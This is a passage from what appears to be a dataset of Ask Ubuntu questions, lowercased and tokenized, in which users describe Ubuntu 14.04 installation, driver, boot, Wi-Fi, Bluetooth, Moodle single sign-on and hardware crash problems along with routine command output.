multicast=yes port=mii speed=10mbit/s ressources : irq:50 porte/s:9000 ( taille=256 ) mémoire : e2104000-e2104fff mémoire : e2100000-e2103fff hcitool dev devices : hciconfig hci0 up ca n't get device info : no such device lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b4 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b4 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b4 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b4 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 540m ] ( rev a1 ) 01:00.1 audio device : nvidia corporation gf108 high definition audio controller ( rev a1 ) 02:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) 03:00.0 sd host controller : ricoh co ltd pcie sdxc/mmc host controller ( rev 09 ) 03:00.1 system peripheral : ricoh co ltd device e232 ( rev 06 ) 03:00.3 firewire ( ieee 1394 ) : ricoh co ltd r5c832 pcie ieee 1394 controller ( rev 05 ) 04:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) maybe you can help me . thanks in advance . olivier
454713	recover lost data after system-installation	i have my lenovo ideapad laptop with 500 gb hard disc with 3ghz i3 processor and i was using windows 8 in my laptop with 3 partitions : c : 50 gb e : 100 mb f : 416 gb windows was installed in c : partition and my very important data is/was in f : partition . then i installed ubuntu in my laptop and selected the option of replacing windows with ubuntu during installation . now after installing ubuntu , i ca n't access my important data that was in f : partition . is there any possibility to recover my lost data ? i just want to recover a specific folder of 40gb that was in f partition please help me , i need that data very badly ... or i will go mad
454715	ubuntu 14.04 desktop install issue with nvidia gt 240 - colorful static	while trying to install ubuntu 14.04 desktop via usb key or dvd drive , i see a blurred colorful screen after the ubuntu installation logo in the installation process and it simply hangs there . i have an nvidia gt 240 in a newer hp z workstation with xeon e5 processor , and have tried both via vga connection and hdmi connection- both yield screen with colorful static . the usb and dvd disc work fine as i tested them on a 10 year old compaq , so i know it 's specific to that machine with the issue . is there any fix or workaround ? thanks
454716	wi-fi issues i keep losing internet connection	after i upgrade ubuntu to the last version my internet connection now is a nightmare keep losing wi-fi connection sometime even after few sec only way to reconect is to dezactivate ''enable wi-fi '' then enable again ... is really annoying do something please http : //www.netscan.co/r/reqmb
454717	bash script for git checkout	how do we create a bash script to do a git checkout on a couple of previous commits ? cd /users/testuser/testproject for i in `cat /users/testuser/desktop/commits.txt` do git checkout $ i i have this snippet above . do n't know if it is the right thing though . any help is appreciated .
454719	14.04 system hangs and io errors	to my surprise , after todays fresh ubuntu 14.04 install ( fully updated as of today ) i 'm getting various problems like random hangs and i/o errors when copying/moving files ( moving backup from hdd to ssd - checked both drives and there are n't any bad sectors ) . i heard 14.04 enabled trim by default and i 'm not sure if it 's causing the problem or not . im pretty sure my system hangs due to i/o problems , any idea ? using ubuntu since 11.04 and never had problem like that before . partitions : ssd : sda1 - ext4 - / 18gb sda2 - ext4 - /home 110gb hdd : sdb1 - ext4 - /media/misc 600gb sdb2 - ext4 - /media/games 400gb specs : intel i7-3770k 8gb ram nvidia gtx770 4gb ( 331 driver blob installed from drivers menu ) adata 128gb ssd | 1tb segate hdd .
454720	`` try ubuntu '' ends in frozen screen after requesting low-graphic mode	before installing i wanted to try ubuntu first on my laptop to see its performance , but unfortunately i did n't even get that far . i boot ubuntu 14.04 from a usb stick in legacy mode on a lenovo ideapad flex 14d ( amd e1-2100 cpu ) with windows 8.1 . up to the selection screen where to choose between `` try '' and `` install '' everything works perfectly fine - even the touchscreen works ! when i then klick `` try '' the following message appears : '' the system is running in low-graphics mode - your screen , graphics and input device settings could not be detected correctly . you will need to configure these yourself . '' on `` run in low-graphics mode for one session '' the screen turns black and nothing happens . any other option like e.g . trouble shoot are also dead ends . what do i do here ? can anyone help ? would be glad if your answer is dummy-proof ( i 'm new to ubuntu ) . many thanks , anja
454721	are ffmpeg , imageshack included on ubuntu server ?	i 'm finally setting up my own server for my two websites and i 'd like to know what image and video applications are included in ubuntu server , such as ffmpeg , imagemagick , etc .
454722	is 14.04 best release for a netbook ?	i have dusted off an old hp mini 1030 netbook : intel atom cpu n270 ( 1.60ghz x 2 ) , 2gb ram , not a snappy performer with 14.04 . can anyone recommend a better release that is somewhat stable ? or should i go back to windows 7 .
454724	ca n't install windows 8.1	i do have latest version of ubuntu , and i would like to remove it to install windows 8.1 but when i begin installing windows , it tells me ca n't install in this partition because it 's not ntfs or something ... what should i do please ? thank you
454727	driver for intel centrino n-2230 with fru 04w3765	i got fed up with my lenovo e530 's bcm43228 that did n't start working so i bought a special intel centrino n-2230 04w3765 because of lenovo whitelisting the wifi cards on bios . now i faced a smaller problem that still seems to be too much for me . now that the pcie card has a different id ( if i understood the idea ) the system ca n't find the right driver for it . so how can i force my system to use the right driver for intel centrino n-2230 ? if you need some information , please ask .
454729	installed 14.04 and nvidia graphics card wo n't load	so i 've installed 14.04 and after hours of working on it i finally got grub to work . i noticed during the live cds that my main monitor ( powered by my nvidia card ) was n't working , and i figured that a proprietary driver install would fix it . it did n't . i also tried the nouveau driver , but to no avail . i understand i need to go to the nvidia-settings to enable the monitor , but i can not get it to load anything but the options page and some other useless tab . i remembered this issue back when i used to use my old laptop ( i ran 12.04 , and i would 've had that on this pc sooner but i was waiting for 14.04 ) , and i knew that running something like optirun -b primus glxgears would fix it , but it did n't . i get this message whenever i try to run something with optirun . $ optirun -b primus glxgears [ 1041.451645 ] [ error ] the bumblebee daemon has not been started yet or the socket path /var/run/bumblebee.socket was incorrect . [ 1041.451662 ] [ error ] could not connect to bumblebee daemon - is it running ? i tried the steps listed here , http : //ubuntuforums.org/showthread.php ? t=1960883 but i ca n't get the very first command to work , and the other solutions did not help either . does anyone know of a solution ? thanks . edit : i have also tried purging and reinstalling it , no difference . edit # 2 : i know this is a bit off topic , but if anyone knows of a way to make it to where you do n't have to be root to access other drives , it would help tremendously . edit # 3 : i 've tried doing as the first response has suggested , but it has n't helped . you can view what we have tried in the comment section of that answer . i still do n't have a solution , but the best thing i have to go on now would be to install a version of bumblebee 3.0 and behind . anyone know how to do this ? specs intel i7 4770k msi 780 ti gaming 16 gigs ram 256 gig samsung 840 pro ssd and 1tb hdd for storage dual booting windows 7 ( or winderp $ as i like to call it ) and ubuntu
454730	no targets specified and no makefile found . stop	i have a problem here u go , i want to install qtractor . i wrote in terminal cd /home/hl/documenten/qtractor-0.6.0 after that i did write and enter : sh ./configure this is what i get . checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking how to run the c preprocessor ... gcc -e checking for g++ ... g++ checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking how to run the c++ preprocessor ... g++ -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking whether gcc needs -traditional ... no checking for qt library version > = 4.4 ... no ; qt 4.4 or greater is required after this i write and enter make no targets specified and no makefile found . stop
454734	running wireshark `` lua : error during loading ''	by running wireshark in 14.04 i got this error what should i do to solve this ? lua : error during loading : [ string `` /usr/share/wireshark/init.lua '' ] :46 : dofile has been disabled due to running wireshark as superuser . see http : //wiki.wireshark.org/capturesetup/captureprivileges for help in running wireshark as an unprivileged user .
454737	how to resize the root space from 8gb to 40gb	i have below structure of partitions of my hard disk of 250gb . my root space is 8gb , which is increasingly becoming very congested . can you suggest a way to increase my root space ?
454740	need a wireless network card that works well with 14.04	i am building my mom a computer and she needs a wireless card . i installed ubuntu 14.04 and everything worked fine when connected through the ethernet but after installing the asus pce-n15 that says it works with linux i am having issues . it connected fine without any driver installation but the internet loads slowly and strangely . the speedtest is only showing 4-7mbps download and other wireless devices close by are getting about 16-20mbps download . now it 's not connecting at all . can anyone suggest a desktop card that works well with 14.04 ? or if you have a solution to my issue i am willing to try that too . i tried to install the driver that asus provides but it wo n't install . it 's very possible i am doing it wrong . any help is appreciated .
454743	grub was not installed properly during installation of 14.04	have a hp probook 4310s with windows 7 . it previously had 4 partitions ( c : , system , hp_recovery , hp_tools ) . i backed up the hp_tools partition and removed the partition . i then partitioned c : to install ubuntu ( the 4 partitions were dynamic so i had to free up a dynamic partition in order to install ubuntu ) . i restarted the laptop and it booted into windows without issue . i then followed the installation instructions from here , obviously using the new lts version : http : //www.techspot.com/community/topics/step-by-step-beginners-guide-to-installing-ubuntu-11-10.172128/ at the very end of the installation process i got an error message saying that grub was not installed properly . however the installation appeared to complete nonetheless and the laptop restarted itself . unfortunately it loaded to a failure to boot screen for windows . it says drivers have been removed . i assume i have somehow installed to the wrong partition , despite it being a very simple process and very easy for me to recognise the different partitions . i have now booted into the `` try ubuntu '' from the cd and found that 2 of the 4 partitions appear to have linux files installed - c : and hp_recovery . is there any way to recover from this ? and has anyone ever seen one ubuntu installation go onto two different partitions ?
454744	need help enabling vsync on ati open source driver	so , i 've been researching a little , and i came across : https : //wiki.archlinux.org/index.php/ati the page basically explains how to set up a lot of things with the open source driver , but none of the files are found on their mentioned locations . i found that for vsync i need to add : option `` exavsync '' `` yes '' but i do n't know where . i 'm running ubuntu 14.04 and using amd radeon hd 7750 series graphics card .
454748	trying to configure sso for moodle	edit i do n't actually see the 500 error in the apache2 error log . i switched moodle 's configuration to try ntlm authentication in all browsers , rather than just in ie and the server 500 error no longer appears . i just need to find out what the issue with the failed authentication is . i am running ubuntu 14.04 with apache 2.4 and moodle 2.6.2 , trying to get sso to work with our windows domain . i have added the following to the apache2.conf : < ifmodule ! mod_auth_ntlm_winbind.c > loadmodule auth_ntlm_winbind_module /usr/lib/apache2/modules/mod_auth_ntlm_winbind.so < /ifmodule > < directory `` /var/www/moodle/auth/ldap/ '' > < files ntlmsso_magic.php > ntlmauth on authtype ntlm authname `` moodle ntlm authentication '' ntlmauthhelper `` /usr/bin/ntlm_auth -- helper-protocol=squid-2.5-ntlmssp '' ntlmbasicauthoritative on require valid-user < /files > < /directory > i also have ntlm turned on in moodle , and winbind is installed and working since wbinfo -u and wbinfo -g both return proof that they have bound accounts and groups from the domain controller . smb.conf has been altered to add the following : [ global ] security = ads realm = mydomain.local password server = server.mydomain.local workgroup = mydomain idmap uid = 10000-20000 idmap gid = 10000-20000 winbind enum users = yes winbind enum groups = yes template homedir = /home/ % d/ % u template shell = /bin/bash client use spnego = yes client ntlmv2 auth = yes encrypt passwords = yes winbind use default domain = yes restrict anonymous = 2 when i try to test sso and log in , i get the message `` auto-login failed , try the normal login window ... `` i 'm not quite sure which logs to check , as the only evidence i can find in any logs is that there is a 500 internal server error being thrown .
454749	installing ubuntu 14.04 alongside windows 8.1	i 'm attempting to install ubuntu 14.04 alongside windows 8.1 . i had ubuntu 12.04 installed with windows 8.1 before , but it became corrupted so i decided to do a complete uninstall/reinstall with 14.04 . i 'm booting from a usb stick that contains 14.04 . it boots successfully to the usb stick , and i 'm able to get to the installation screen for ubuntu . i click on `` install ubuntu '' , and connect to the internet successfully . i meet all the requirements by the installer ( enough hard drive space to install , connected to the internet , laptop is plugged in ) , so i click next to start installing . i select `` install ubuntu alongside windows '' , and click next . then my laptop reboots and boots into windows 8.1 . there is no evidence that ubuntu was installed . i 've tried it multiple times and every time it reboots at that step and automatically goes to windows . i 've also tried to quickly enter the boot order menu when it does reboot and boot again from my usb stick ( also does not work ) . i do n't have a blank cd at hand to make a boot cd/dvd , so i have to try and make my usb stick work . has anybody else experienced this problem ? any ideas on a solution ?
454751	phpmyadmin with mysql on the other host	how can i install phpmyadmin with mysql on the other node ? i actually have openstack cloud deployed and want to have installed apache and php on one node and mysql on the other node . now i want to install phpmyadmin inside first node .
454755	locked down quick boot to cd only	i am looking to make up some patron surfing/document writing laptops for our local library . i would like them to boot to a cd without a hard drive in such a way so that the computer starts up swiftly and asks the patron as few questions as possible . it may be a moot point but i would prefer that the users be locked out of altering things like . ~access to certain programs : like the terminal , gparted , system monitor ... ~the ability to modify the gnome panel ~installation of any type of software ~viewing of any directory outside the home folder ( with the exception of removable storage devices ) ~the ability to run any executable files located in the users home folder or any removable storage device . the current live cd takes about 8min . to boot up and asks the patron if they want to `` try ubuntu '' once it is loaded up i would say that it is currently plenty fast for basic use on the laptops i have tested for this use .
454757	help ! upgraded to 14.04 but system no longer starts up !	i recently upgraded my system from 13.10 to 14.04 and since then my system no longer starts up . the pc will turn on and the system will start but it wo n't get to the password login screen . i have n't been able to find a way around this and i keep getting certain messages when i turn the pc off . can anyone help me with this please ? !
454760	access packages in distributions from launchpad api	i 'm trying to write a python script that downloads the latest package from launchpad using the launchpadlib pip . for a project like grep , i want to be able to download the source packages for a distribution , like the files seen here https : //launchpad.net/ubuntu/trusty/+source/grep . instead , i can only download the files seen here https : //launchpad.net/grep/main , which seem to be outdated when compared to what is with in the distributions . is this possible with the launchpad api ?
454761	externally install ubuntu drivers ?	i 'm going to be installing ubuntu 14.04 within the next few hours , and i 've noticed that every time i install ubuntu on my laptop , i never have any networking or graphics drivers . i always have to connect to ethernet and install them , and it 's really a pain as this laptop has a broken screen and keyboard , and it 's mouse is barely working . i have it hooked up to a monitor , usb keyboard , and mouse . so , basically my question is , can i download drivers for my graphics and network adapter before going into ubuntu , and put them on my external hard drive to install when i get settled into ubuntu and everything . is this possible or should i prepare to have to run ethernet cables all through my house ? edit : my machine has a broadcom wireless card , i think . i 've always installed broadcom drivers every time i install ubuntu .
454765	kiosk for public library online catalog with very limited user .	i need to make a few computers boot directly into our local public libraries online catalog webpage and only our catalog ( no log-in , no extra-net ) . i also need to know that patrons will not be able to close the browser , mess with our network or alter anything at all . i have found a similar question here but not locked down for the online catalog only .
454767	new bootloader for ubuntu ?	challenging it is to get ubuntu to boot right with single ubuntu install since the introduction of ( u ) efi bios . i have had , and am having difficulties getting a new pc boot to from an ssd disk . it seems to be that the new grub2 is buggy and that the 14.04 install is n't able to set the boot up correctly . i consider myself a power user . i have spent days trying to solve this problem , partly through askubuntu.com 's question bios not detecting boot files for 14.04lts single os installation without succeeding . i do n't want a boot menu with a single boot . i want to boot right into ubuntu , but that seems nearly impossible to achieve .
454770	change 'eclipse ' command to correct path	currently i have eclipse installed on `` home/gabriel/programs/eclipse/eclipse '' and i have already created the eclipse.desktop file with correct parameters and it 's working fine , but i ca n't use the command 'eclipse ' at the terminal to open eclipse , it gives me this error : /usr/bin/eclipse : 5 : /usr/bin/eclipse : home/gabriel/programs/eclipse/eclipse : not found how do i change the command 'eclipse ' to execute only `` home/gabriel/programs/eclipse/eclipse '' ? thanks
454771	intel ac 7260 bluetooth immediately disconnects in ubuntu 13.10	i have been struggling with my intel ac 7260 dual band for almost five months and really given up in periods . the wireless part of it usually works fine , but the bluetooth adapter has nearly killed me . i finally got the bluetooth driver to work in windows 7 by downgrading to the bluetooth driver version 3.1.1307.0366 for the card ( luckily the vendor of my computer from had it around ) . any other driver i have tried has failed . now , in ubuntu i have a long story with this card as well . to cut it short , here 's my current state for the card in ubuntu 13.10 : edit the downgrading of the bluetooth driver in windows 7 actually only worked until reboot , so that did not resolve the issue there . /edit the wifi generally works fine , but it disconnects every now and then in periods , sometimes once per hour . mostly annoying , nothing too serious . the bluetooth , however , is another story . most often , the bluetooth icon is loaded into the task bar , sometimes it is not ( like now , after a suspend ) . at reboot it usually comes back . when the icon is there i can add devices and connect to them , but they are instantly disconnected . this is also true for bluetooth manager utility which i have also installed . here i can also set devices to trusted . this seems to work fine , but i still can not connect without disconnecting . note that i have tested my bluetooth keyboard to my phone and my phone to my bluetooth audio output . all of this works fine . output from various system commands : $ dmesg | grep blue [ 3.279513 ] bluetooth : core ver 2.16 [ 3.279526 ] bluetooth : hci device and connection manager initialized [ 3.279533 ] bluetooth : hci socket layer initialized [ 3.279535 ] bluetooth : l2cap socket layer initialized [ 3.279539 ] bluetooth : sco socket layer initialized [ 3.295312 ] bluetooth : hci0 : read intel version : 370710018002030d2c [ 3.295314 ] bluetooth : hci0 : intel device is already patched . patch num : 2c [ 6.535819 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 6.535822 ] bluetooth : bnep filters : protocol multicast [ 6.535828 ] bluetooth : bnep socket layer initialized [ 6.539007 ] bluetooth : rfcomm tty layer initialized [ 6.539016 ] bluetooth : rfcomm socket layer initialized [ 6.539017 ] bluetooth : rfcomm ver 1.11 [ 456.343021 ] bluetooth : hidp ( human interface emulation ) ver 1.2 [ 456.343030 ] bluetooth : hidp socket layer initialized [ 2632.649682 ] bluetooth : hci0 : read intel version : 370710018002030d00 [ 2632.649994 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 2632.765840 ] bluetooth : hci0 : intel bluetooth firmware patch completed and activated not sure what happened at 2632 there , but it seems to have started using the firmware is located at $ sudo find / -name ibt-hw-37.7.10-fw-1.80.2.3.d.bseq /lib/firmware/intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq kernel version : $ uname -r 3.11.0-19-generic my wifi/bluetooth card : $ lspci | grep 7260 06:00.0 network controller : intel corporation wireless 7260 ( rev 63 ) installed bluez stuff : $ bluez < tab tab > bluez-simple-agent bluez-test-device bluez-test-network bluez-simple-service bluez-test-discovery bluez-test-serial bluez-test-adapter bluez-test-input bluez-test-service bluez-test-audio bluez-test-manager bluez-test-telephony contents of /etc/bluetooth/main.conf : $ cat /etc/bluetooth/main.conf [ general ] # list of plugins that should not be loaded on bluetoothd startup # disableplugins = network , input # default adaper name # % h - substituted for hostname # % d - substituted for adapter id name = % h- % d # default device class . only the major and minor device class bits are # considered . class = 0x000100 # how long to stay in discoverable mode before going back to non-discoverable # the value is in seconds . default is 180 , i.e . 3 minutes . # 0 = disable timer , i.e . stay discoverable forever discoverabletimeout = 180 # how long to stay in pairable mode before going back to non-discoverable # the value is in seconds . default is 0 . # 0 = disable timer , i.e . stay pairable forever pairabletimeout = 0 # use some other page timeout than the controller default one # which is 16384 ( 10 seconds ) . pagetimeout = 8192 # automatic connection for bonded devices driven by platform/user events . # if a platform plugin uses this mechanism , automatic connections will be # enabled during the interval defined below . initially , this feature # intends to be used to establish connections to att channels . autoconnecttimeout = 60 # what value should be assumed for the adapter powered property when # setproperty ( powered , ... ) has n't been called yet . defaults to true initiallypowered = true # remember the previously stored powered state when initializing adapters rememberpowered = true # use vendor id source ( assigner ) , vendor , product and version information for # did profile support . the values are separated by `` : '' and assigner , vid , pid # and version . # possible vendor id source values : bluetooth , usb ( defaults to usb ) # deviceid = bluetooth:1234:5678 : abcd # do reverse service discovery for previously unknown devices that connect to # us . this option is really only needed for qualification since the bite tester # does n't like us doing reverse sdp for some test cases ( though there could in # theory be other useful purposes for this too ) . defaults to true . reverseservicediscovery = true # enable name resolving after inquiry . set it to 'false ' if you do n't need # remote devices name and want shorter discovery cycle . defaults to 'true ' . nameresolving = true # enable runtime persistency of debug link keys . default is false which # makes debug link keys valid only for the duration of the connection # that they were created for . debugkeys = false # enable the gatt functionality . default is false enablegatt = false lsusb shows $ â lsusb bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 005 : id 046d : c531 logitech , inc . bus 003 device 004 : id 8087:07dc intel corp . bus 003 device 003 : id 147e:1002 upek biometric touchchip/touchstrip fingerprint sensor bus 003 device 002 : id 046d : c06b logitech , inc. g700 wireless gaming mouse bus 003 device 006 : id 5986:0512 acer , inc bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i am starting to freak out on this one . i could go for ubuntu 14.04 and see what happens , but i want to try other stuff first . maybe re-installing something , maybe remove some firmware ? maybe some changes in the main.conf file ? any comments are greatly appreciated !
454772	how can you disable kde notification sounds in ubuntu 14.04 ?	i installed okular pdf viewer in my ubuntu 14.04 . okular is a kde based software and it emits a kde notification sound when i do some actions for example when i overwrite a file . is it possible that i disable these kde notifications sounds and how do i do it ?
454775	debug faulty hardware	my sister has got a laptop that has always crashed on her during windows times ( blue screen ) ( hardware is relatively new and up to date ) . back then she sent the dump files from windows to dell , who sent an engineer who changed the motherboard , but still after setting up ubuntu in many different versions using many different kernels the panics would not go away . so i decided to take action in order to find the exact cause of the problem , i installed and configured the linux-crashdump package ( kdump-tools ) to automatically start a crash kernel using kexec that generates a dump file of the memory and also stores dmesg output . i also installed crash , the kernel-image-generic-dbgsym and mcelog in order to have everything to gather as much information as possible . so the laptop crashed and the crash kernel successfully generated a dump file and stored the dmesg output . i also checked out /var/log/mcelog but the file was completely empty , although the daemon was running before the crash , which is strange , but after all we still have the dmesg output , that states : [ 3933.364173 ] mce : [ hardware error ] : cpu 4 : machine check exception : 5 bank 3 : be00000000200135 [ 3933.364177 ] mce : [ hardware error ] : rip ! inexact ! 10 : < ffffffff8171d9c2 > { _raw_spin_lock+0x12/0x50 } [ 3933.364182 ] mce : [ hardware error ] : tsc a0255fbd7f7 addr 42dd14480 misc d62285 [ 3933.364185 ] mce : [ hardware error ] : processor 0:306a9 time 1398357146 socket 0 apic 1 microcode 15 [ 3933.364186 ] mce : [ hardware error ] : run the above through 'mcelog -- ascii' [ 3933.364188 ] mce : [ hardware error ] : cpu 0 : machine check exception : 5 bank 3 : be00000000200135 [ 3933.364190 ] mce : [ hardware error ] : rip ! inexact ! 33 : < 0000045a7992c1b5 > [ 3933.364191 ] mce : [ hardware error ] : tsc a0255fbd7f0 addr 42dd14480 misc d62285 [ 3933.364194 ] mce : [ hardware error ] : processor 0:306a9 time 1398357146 socket 0 apic 0 microcode 15 [ 3933.364195 ] mce : [ hardware error ] : run the above through 'mcelog -- ascii' [ 3933.364196 ] mce : [ hardware error ] : machine check : processor context corrupt [ 3933.364197 ] kernel panic - not syncing : fatal machine check so my first question would be , regarding `` run the above through 'mcelog -- ascii ' '' ... what exactly should i run there and how ? i tried for example : [ 3933.364173 ] mce : [ hardware error ] : cpu 4 : machine check exception : 5 bank 3 : be00000000200135 | sudo mcelog -- ascii which simply returned nothing . so what i am supposed to do here ? i also ran crash /usr/lib/debug/boot/vmlinux < kernelversion > /path/to/crashdump/file which started the program , as expected and i typed in bt to generate a backtrace which gave me : pid : 0 task : ffff8804177617f0 cpu : 6 command : `` swapper/6 '' # 0 [ ffff88042dd89ca0 ] machine_kexec at ffffffff8104a732 # 1 [ ffff88042dd89cf0 ] crash_kexec at ffffffff810e6ab3 # 2 [ ffff88042dd89db8 ] panic at ffffffff8170ec6c # 3 [ ffff88042dd89e30 ] mce_panic at ffffffff8103687a # 4 [ ffff88042dd89e70 ] do_machine_check at ffffffff81038684 # 5 [ ffff88042dd89f50 ] machine_check at ffffffff8171e25f [ exception rip : intel_idle+216 ] rip : ffffffff813dfd78 rsp : ffff88041775de28 rflags : 00000046 rax : 0000000000000001 rbx : 0000000000000002 rcx : 0000000000000001 rdx : 0000000000000000 rsi : ffffffff81c93220 rdi : 0000000000000006 rbp : ffff88041775de50 r8 : ffff88042dd912d0 r9 : 000000000000001c r10 : 0000000000000320 r11 : 0000000000000249 r12 : 0000000000000002 r13 : 0000000000000001 r14 : 0000000000000001 r15 : ffffffff81c932e8 orig_rax : ffffffffffffffff cs : 0010 ss : 0018 -- - < mce exception stack > -- - # 6 [ ffff88041775de28 ] intel_idle at ffffffff813dfd78 # 7 [ ffff88041775de58 ] cpuidle_enter_state at ffffffff815c9570 # 8 [ ffff88041775de90 ] cpuidle_idle_call at ffffffff815c96a9 # 9 [ ffff88041775ded0 ] arch_cpu_idle at ffffffff8101ceae # 10 [ ffff88041775dee0 ] cpu_startup_entry at ffffffff810beb85 # 11 [ ffff88041775df30 ] start_secondary at ffffffff81040fc8 to sum up , i would like to know , how i can invoke mcelog on the dmesg output and possibly what else steps you would take in order to get as much information about the problem as possible / find the faulty component , so that i can contact the hardware vendor already having an educated guess whats wrong . i know how that memcheck can help me to predict with high probability that the ram is no the cause . edit : i have found out , how to pass the output to mcelog correctly : put the output lines before `` run the above through 'mcelog -- ascii ' '' in a file and invoke mcelog with sudo mcelog -- ascii < file one can see that the `` run the above through 'mcelog -- ascii ' '' message is printed two times in the dmesg file , so i invoked mcelog two times beginning with `` cpu : '' and ending the line before the message ( i left the dmesg stuff like `` [ 3933.364173 ] mce : [ hardware error ] : '' away ) . so mcelog tells me : hardware event . this is not a software error . cpu 4 bank 3 tsc a0255fbd7f7 rip ! inexact ! 10 : ffffffff8171d9c2 misc d62285 addr 42dd14480 time 1398357146 thu apr 24 18:32:26 2014 mcg status : ripv mcip mci status : uncorrected error error enabled mci_misc register valid mci_addr register valid processor context corrupt mca : data cache level-1 data-read error status be00000000200135 mcgstatus 5 cpuid vendor intel family 6 model 58 rip : _raw_spin_lock+0x12/0x50 } socket 0 apic 1 microcode 15 and hardware event . this is not a software error . cpu 0 bank 3 tsc a0255fbd7f0 rip ! inexact ! 33:45a7992c1b5 misc d62285 addr 42dd14480 time 1398357146 thu apr 24 18:32:26 2014 mcg status : ripv mcip mci status : uncorrected error error enabled mci_misc register valid mci_addr register valid processor context corrupt mca : data cache level-1 data-read error status be00000000200135 mcgstatus 5 cpuid vendor intel family 6 model 58 socket 0 apic 0 microcode 15 so assuming that the motherboard is okay ( as it has been changed ) and if ram is okay there is only the cpu left to be the troublemaker right ? is anyone familiar with all the output given ?
454777	installing a store bought game	i bought the sims3 for my kid and am trying to install it on the computer . it wo n't auto install and i ca n't seem to figure out how to manually do it either . please help . once i have the play on linux , how do i find it on the computer ?
454779	unity will not boot/load after upgrade from 13.10 to 14.04	there are many similar post on ask ubuntu and i have gone through them with little success . i upgraded from 13.04 to 13.10 to 14.04 back to back . the upgrade from 13.03 to 13.10 worked fine . after the upgrade from 13.10 to 14.04 i ran into a problem . after logging into my computer i am left with only the background image and no other desktop or unity elements . no key bindings work ( ctrl+alt+t for example ) . i am able to drop into a terminal using ctrl+alt+ ( f1+f6 ) . once logged into a terminal i am able to run things like apt-get and other shell utilities . i can not run anything graphical without first telling the terminal where to send it by exporting display 0 export display=:0 once i have done that i can run gui based programs like firefox . one thing to note , if i run nautilus from the terminal it shows me the desktop and the bar at the top of the screen with the nautilus options ( file edit view go bookmarks help ) . i have tried re-enabling unity from ccsm , no change , i have reinstalled unity and ubuntu-desktop , no change . i have uninstalled and reinstalled nvida-current drivers , again , no change . i have done everything i can think of to investigate this problem ( which is not much since i am still pretty new to this ) . if there is anything i should do to further investigate this let me know and i will run it asap . i am still able to switch the standard output to a file on the desktop and access it from there . any help would be greatly appreciated edits to grammar and spelling were applied . update : based on the suggestions made in this post . i did the following ; sudo apt-get install -- reinstall ubuntu-desktop sudo apt-get install unity sudo apt-get purge nvidia* bumblebee* sudo apt-get install nvidia-prime sudo shutdown -r now now , after i log into my computer i see the items on my desktop . i can also open nautilus by pressing ctrl+n . the ability to right click has returned which allows me to open a terminal . however , ctrl+alt+t still does not work . i am unable to grab and move any windows around or bring program windows from the back of the desktop to the front by clicking on them . they stay stacked in the order i opened them , with the most recent window on top . i checked compiz setting manager again and unity is activated . update 2 : i think this may be an opengl problem . i ran the following command in the termial ; display=:0 unity and i get the following output before the terminal hangs . compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service start/running , process 2707 compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : move compiz ( core ) - info : starting plugin : move compiz ( core ) - info : loading plugin : place compiz ( core ) - info : starting plugin : place compiz ( core ) - info : loading plugin : snap compiz ( core ) - info : starting plugin : snap compiz ( core ) - info : loading plugin : commands compiz ( core ) - info : starting plugin : commands compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - error : plugin 'opengl ' not loaded . i am not sure what to do about this , 